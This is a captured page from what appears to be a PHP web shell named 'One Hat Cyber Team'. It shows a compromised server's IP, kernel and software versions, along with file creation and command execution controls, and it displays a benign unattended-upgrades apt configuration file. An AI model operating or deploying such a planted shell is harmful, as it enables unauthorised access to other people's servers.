One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
apt
/
apt.conf.d
/
View File Name :
zzzz-temp-installer-unattended-upgrade
# Config for the unattended-upgrades run to avoid failing on battery power or # a metered connection. Unattended-Upgrade::OnlyOnACPower "false"; Unattended-Upgrade::Skip-Updates-On-Metered-Connections "true"; # Set MinimalSteps to false to speedup install times. "true", the default, will # atmoize updates to enable interrupts between downloads, but this causes the # install to slow down considerably. This is a major bottleneck of the install. # Some testing shows a 3-4x speedup on the unattended-upgrades section of the # install when this is set to false. However, this will make interrupting # this section of the install process difficult. Unattended-Upgrade::MinimalSteps "false"; # A copy of the current default unattended-upgrades config to grab # security. Unattended-Upgrade::Allowed-Origins { "${distro_id}:${distro_codename}"; "${distro_id}:${distro_codename}-security"; "${distro_id}ESMApps:${distro_codename}-apps-security"; "${distro_id}ESM:${distro_codename}-infra-security"; };